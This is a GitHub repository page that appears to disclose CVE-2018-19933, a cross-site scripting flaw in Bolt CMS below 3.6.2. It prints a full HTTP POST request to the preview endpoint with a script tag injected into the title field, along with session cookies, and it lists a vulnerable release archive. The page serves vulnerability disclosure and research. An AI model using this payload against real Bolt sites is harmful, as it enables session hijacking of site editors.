Skip to content

rdincel1/Bolt-CMS-3.6.2---Cross-Site-Scripting

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits

Bolt CMS 3.6.2 Vulnerability.txt

Bolt CMS 3.6.2 Vulnerability.txt

 
 

PoC.mp4

PoC.mp4

 
 

PoC_1.PNG

PoC_1.PNG

 
 

README.md

README.md

 
 

bolt-v3.6.2.zip

bolt-v3.6.2.zip

 
 

burp.PNG

burp.PNG

 
 

Repository files navigation

Bolt CMS <3.6.2 - Cross-Site Scripting Vulnerability

Bolt CMS <3.6.2 - Cross-Site Scripting Vulnerability

CVE-2018-19933

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19933

Proof of Concept

To exploit vulnerability, Bolt CMS <3.6.2 allows XSS via text input click preview button as demonstrated by the Title field of a Configured and New Entry.

POST /preview/page HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/bolt/editcontent/pages
Content-Type: application/x-www-form-urlencoded
Content-Length: 396
Connection: close
Cookie: bolt_session_cf7976ea5999f8e272ce7cd50c84d240=14b61865131cf9422af970ae28a097b7; bolt_authtoken_cf7976ea5999f8e272ce7cd50c84d240=0b69633d5a549f19bf3faa88462b7b8e17ba57ba9dff6d25a708efe6dd6a9a04
Upgrade-Insecure-Requests: 1

content_edit%5B_token%5D=jMmm41dJQXpXx3gwE_VQkA60fdsNo6DERJClPVkYh7U&editreferrer=&contenttype=pages&title=%3Cscript%3Ealert%28%22Raif%22%29%3C%2Fscript%3E&slug=script-alert-raif-script&image%5Bfile%5D=&files%5B%5D=&teaser=&body=&template=&taxonomy%5Bgroups%5D%5B%5D=&taxonomy-order%5Bgroups%5D=0&id=&status=draft&datepublish=2018-12-07+00%3A12%3A05&datedepublish=&ownerid=1&_live-editor-preview=

Proof of Concept (Video)

PoC_Video

Screenshots

PoC_1 Request

About

Bolt CMS <3.6.2 - Cross-Site Scripting Vulnerability

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published